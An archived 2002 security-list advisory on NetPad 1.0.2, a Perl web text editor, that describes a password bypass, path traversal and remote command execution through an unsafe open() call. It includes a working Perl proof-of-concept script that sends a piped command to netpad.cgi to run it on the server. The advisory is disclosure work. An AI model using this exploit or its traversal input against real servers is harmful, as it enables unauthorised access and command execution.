LevCGI.coms NetPad 1.0.2 multiple vulnerabilities

From: BrainRawt . (brainrawtat_private)
Date: Mon May 13 2002 - 18:44:28 PDT

Next message: Matthew G. Marsh: "Re: Linux kernel 2.4 "weak end host" issue Explained"

Previous message: 3APA3A: "Re: Fwd: GOBBLES RESPONSE TO THE BLUE BOAR ("fixed version")"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Levcgi.coms NetPad 1.0.2 Multiple Vulnerabilities Advisory
Discovered By b0iler(b0ilerat_private) and 
BrainRawt(brainrawtat_private)

About Netpad:
------------------
<quote from levcgi.com>

Easy to install and use text editor for your web browser! This NotePad like
program allows you to open your files and pages online in your browser and
edit their contents through the browser without forcing you to re-upload
your changes all the time! Extremely effecient and a must have tool for all
webmasters!

</quote from levcgi.com>

According to the website,  ...NetPad has been downloaded 1225 times!


Vulnerable (tested) Versions:
--------------------
NetPad v 1.0.2


Vendor Contact:
----------------
4-28-02 - Emailed levat_private


Vulnerabilities:

-- Password Bypass

1. The website claims "password security feature to prevent unauthorized 
access!",
    but this is NOT true.

    A password is not required to read files.  It is only required to write 
to files.

-- Path Traversal

2. Improper filtering of input allows one to enter the traditional 
"../../../" into
    the input field to crawl back through directories of the server hosting 
netpad.cgi,
    allowing one to view any file readable by the webserver.

-- Command Execution

3. Due to improper usage of the open() function and input filtering, it is 
possible
    for a malicious visitor to remotely execute commands on the server 
hosting
    netpad.cgi

    Proof of Concept code can be found below............

Remote Command Execution Exploit (POC):
---------------------------------------

#!/usr/bin/perl
# exploit for levcgi's NetPad 1.0.2
#
# This could easily be done with any browser and alittle effort.
#
# requires LWP avaliable at
# http://www.linpro.no/lwp/libwww-perl-5.64.tar.gz
# also, the number of ../'s differs.  It depends on what $basedir
# is set to in the netpad.cgi script
#
# usage: perl script.pl http://site.tld/cgi-bin/netpad.cgi 
../../../../bin/command

use LWP::UserAgent;
$ua = new LWP::UserAgent;
$ua->agent("your open call can be exploited" . $ua->agent);

my $req = new HTTP::Request POST => $ARGV[0];
$req->content_type('application/x-www-form-urlencoded');
foreach(@ARGV){ $of .= "$_ " unless($_ eq $ARGV[0]); }
$req->content("proc=open&of=${of}|");

my $res = $ua->request($req);
if ($res->is_success) { print $res->content . "\n\nit should have 
worked.\n"; }
else {  print "request failed.\n"; }

Fix:
------

No matter how well one filters input to this program, we recommend that the
program itself be protected by htaccess.

--------------------------------------------------------------------------
Did you (Lev) say something about stupid people doing stupid things? - 
BrainRawt


_________________________________________________________________
Send and receive Hotmail on your mobile device: http://mobile.msn.com

Next message: Matthew G. Marsh: "Re: Linux kernel 2.4 "weak end host" issue Explained"
Previous message: 3APA3A: "Re: Fwd: GOBBLES RESPONSE TO THE BLUE BOAR ("fixed version")"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue May 14 2002 - 08:42:02 PDT